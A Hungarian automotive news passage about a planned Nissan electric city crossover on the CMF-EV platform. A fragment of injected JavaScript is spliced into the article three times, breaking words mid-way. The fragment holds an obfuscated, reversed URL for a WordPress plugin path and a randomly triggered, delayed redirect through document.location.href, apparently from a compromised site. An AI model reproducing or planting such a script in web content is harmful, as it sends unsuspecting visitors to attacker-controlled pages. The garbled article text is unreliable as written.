Már tavaly lehetett tudni, hogy nem az Ariya lesz az egyetlen modell, amely a frissen kifejlesztett, elektromos CMF-EV padlólemezt használja. Most toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}további részletekre is fényt derítettek brit újságírók: a jelek szerint egy városi szabadidőjármű lehet a következő modell, amely megkapja az Ariya technológiáját. A fejlett E-4ORCE összkerékhajtási rendszer ugyan költségcsökkentési megfontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolásból ki fog maradni a típusból, de egy városi autóban egyébként sincs nagy szükség rá, még akkor sem, ha a rendszer a karosszéria hossz- és kereszttengelye körüli billenését is képes mérsékelni, tehát javítja a menetbiztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonságot és -kényelmet. Noha az elektromos crossover akkorának ígérkezik, mint a Nissan Juke, annál vélhetően tágasabb lesz, mivel az elektromos hajtáslánc…
- Hirdetés -